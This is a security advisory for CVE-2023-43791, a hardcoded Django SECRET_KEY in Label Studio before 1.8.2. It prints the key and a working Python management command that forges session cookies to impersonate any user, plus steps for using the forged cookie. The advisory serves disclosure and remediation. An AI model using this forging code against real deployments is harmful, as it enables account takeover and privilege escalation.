Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1mNDc1LXg4M20tcng1bc4AA3Ax
Label Studio has Hardcoded Django `SECRET_KEY` that can be Abused to Forge Session Tokens
Introduction
This write-up describes a vulnerability found in Label Studio, a popular open source data labeling tool. The vulnerability was found to affect versions before 1.8.2
, where a patch was introduced.
Overview
In Label Studio version 1.8.1, a hard coded Django SECRET_KEY
was set in the application settings. The Django SECRET_KEY
is used for signing session tokens by the web application framework, and should never be shared with unauthorised parties.
However, the Django framework inserts a _auth_user_hash
claim in the session token that is a HMAC hash of the account's password hash. That claim would normally prevent forging a valid Django session token without knowing the password hash of the account. However, any authenticated user can exploit an Object Relational Mapper (ORM) Leak vulnerability in Label Studio to leak the password hash of any account on the platform, which is reported as a separate vulnerability. An attacker can exploit the ORM Leak vulnerability (which was patched in 1.9.2post0
) and forge session tokens for all users on Label Studio using the hard coded SECRET_KEY
.
Description
Below is the code snippet of the Django settings file at label_studio/core/settings/base.py
.
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '$(fefwefwef13;LFK{P!)@#*!)kdsjfWF2l+i5e3t(8a1n'
This secret is hard coded across all instances of Label Studio.
Proof of Concept
Below are the steps that an attacker could do to forge a session token of any account on Label Studio:
-
Exploit the ORM Leak vulnerability (patched in
1.9.2post0
) in Label Studio to retrieve the full password hash that will be impersonated. For this example, a session token will be forged for an account with the email[email protected]
with the password hashpbkdf2_sha256$260000$KKeew1othBwMKk2QudmEgb$ALiopdBpWMwMDD628xeE1Ie7YSsKxdXdvWfo/PvVXvw=
that was retrieved. -
Create a new Django project with an empty application. In
cookieforge/cookieforge/settings.py
set theSECRET_KEY
to$(fefwefwef13;LFK{P!)@#*!)kdsjfWF2l+i5e3t(8a1n
. Create a management command with the following code that will be used to create forged session tokens.
from typing import Any
from django.core.management.base import BaseCommand, CommandParser
from django.core import signing
from django.utils.crypto import salted_hmac
from django.conf import settings
import time, uuid
class Command(BaseCommand):
help = "Forge a users session cookie on Label Studio"
def add_arguments(self, parser: CommandParser) -> None:
parser.add_argument(
'-o', '--organisation',
help='Organisation ID to access',
default=1,
type=int
)
parser.add_argument(
'user_id',
help='The User ID of the victim you want to impersonate',
type=str
)
parser.add_argument(
'user_hash',
help='The password hash the user you want to impersonate'
)
def handle(self, *args: Any, **options: Any) -> str | None:
key = settings.SECRET_KEY
# Creates the _auth_user_hash HMAC of the victim's password hash
auth_user_hash = salted_hmac(
'django.contrib.auth.models.AbstractBaseUser.get_session_auth_hash',
options['user_hash'],
secret=key,
algorithm="sha256"
).hexdigest()
session_dict = {
'uid': str(uuid.uuid4()),
'organization_pk': options['organisation'],
'next_page': '/projects/',
'last_login': time.time(),
'_auth_user_id': options['user_id'],
'_auth_user_backend':
'django.contrib.auth.backends.ModelBackend',
'_auth_user_hash': auth_user_hash,
'keep_me_logged_in': True,
'_session_expiry': 600
}
# Creates a forged session token
session_token = signing.dumps(
session_dict,
key=key,
salt="django.contrib.sessions.backends.signed_cookies",
compress=True
)
self.stdout.write(
self.style.SUCCESS(f"session token: {session_token}")
)
- Next run the following command replacing the
{user_id}
with the user ID of the account you want to the impersonate and{user_hash}
with the victim's password hash. Copy the session token that is printed.
python3 manage.py forgecookie {user_id} '{user_hash}'
- Change the
sessionid
cookie on the browser and refresh the page. Observe being authenticated as the victim user.
Impact
This vulnerability can be chained with the ORM Leak vulnerability (which was patched in 1.9.2post0
) in Label Studio to impersonate any account on Label Studio. An attacker could exploit these vulnerabilities to escalate their privileges from a low privilege user to a Django Super Administrator user.
Remediation Advice
It is important to note that the hard coded SECRET_KEY
has already been removed in Label Studio versions >=1.8.2
. However, there has not been any public disclosure about the use of the hard coded secret key and users have not been informed about the security vulnerability.
We recommend that Human Signal to release a public disclosure about the hard coded SECRET_KEY
to encourage users to patch to a version >=1.8.2
to mitigate the likelihood of an attacker exploiting these vulnerabilities to impersonate all accounts on the platform.
Discovered
- August 2023, Robert Schuh, @robbilie
- August 2023, Alex Brown, elttam
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mNDc1LXg4M20tcng1bc4AA3Ax
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Critical
Classification: General
Published: about 1 year ago
Updated: 11 days ago
CVSS Score: 9.8
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS Percentage: 0.00102
EPSS Percentile: 0.42921
Identifiers: GHSA-f475-x83m-rx5m, CVE-2023-43791
References:
- https://github.com/HumanSignal/label-studio/security/advisories/GHSA-f475-x83m-rx5m
- https://github.com/HumanSignal/label-studio/pull/4690
- https://github.com/HumanSignal/label-studio/commit/3d06c5131c15600621e08b06f07d976887cde81b
- https://github.com/HumanSignal/label-studio/releases/tag/1.8.2
- https://nvd.nist.gov/vuln/detail/CVE-2023-43791
- https://github.com/pypa/advisory-database/tree/main/vulns/label-studio/PYSEC-2023-274.yaml
- https://github.com/advisories/GHSA-f475-x83m-rx5m
Blast Radius: 15.6
Affected Packages
pypi:label-studio
Dependent packages: 1Dependent repositories: 39
Downloads: 61,690 last month
Affected Version Ranges: < 1.8.2
Fixed in: 1.8.2
All affected versions: 0.4.1, 0.4.2, 0.4.3, 0.4.4, 0.4.5, 0.4.6, 0.4.7, 0.4.8, 0.5.0, 0.5.1, 0.6.0, 0.6.1, 0.7.0, 0.7.1, 0.7.2, 0.7.3, 0.7.4, 0.8.0, 0.8.1, 0.8.2, 0.9.0, 0.9.1, 1.0.0, 1.0.1, 1.0.2, 1.1.0, 1.1.1, 1.4.1, 1.5.0, 1.6.0, 1.7.0, 1.7.1, 1.7.2, 1.7.3, 1.8.0, 1.8.1
All unaffected versions: 1.8.2, 1.9.0, 1.9.1, 1.9.2, 1.10.0, 1.10.1, 1.11.0, 1.12.0, 1.12.1, 1.13.0, 1.13.1, 1.14.0